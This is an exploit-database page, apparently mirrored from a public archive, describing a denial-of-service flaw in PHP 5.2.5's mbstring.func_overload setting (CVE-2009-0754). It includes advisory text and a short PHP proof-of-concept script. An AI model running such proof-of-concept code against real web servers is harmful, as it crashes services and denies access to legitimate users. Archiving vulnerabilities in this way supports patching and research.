[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service

Author: strategma
type: dos
platform: php
port: 
date_added: 2009-01-30 
date_updated: 2014-04-09 
verified: 1 
codes: CVE-2009-0754;OSVDB-53574 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/33542/info

PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.

Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users.

<?php
        $v = 'Òîâà å òåñò|test.php';
        print substr($v,0,strpos($v,'|'));
?>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.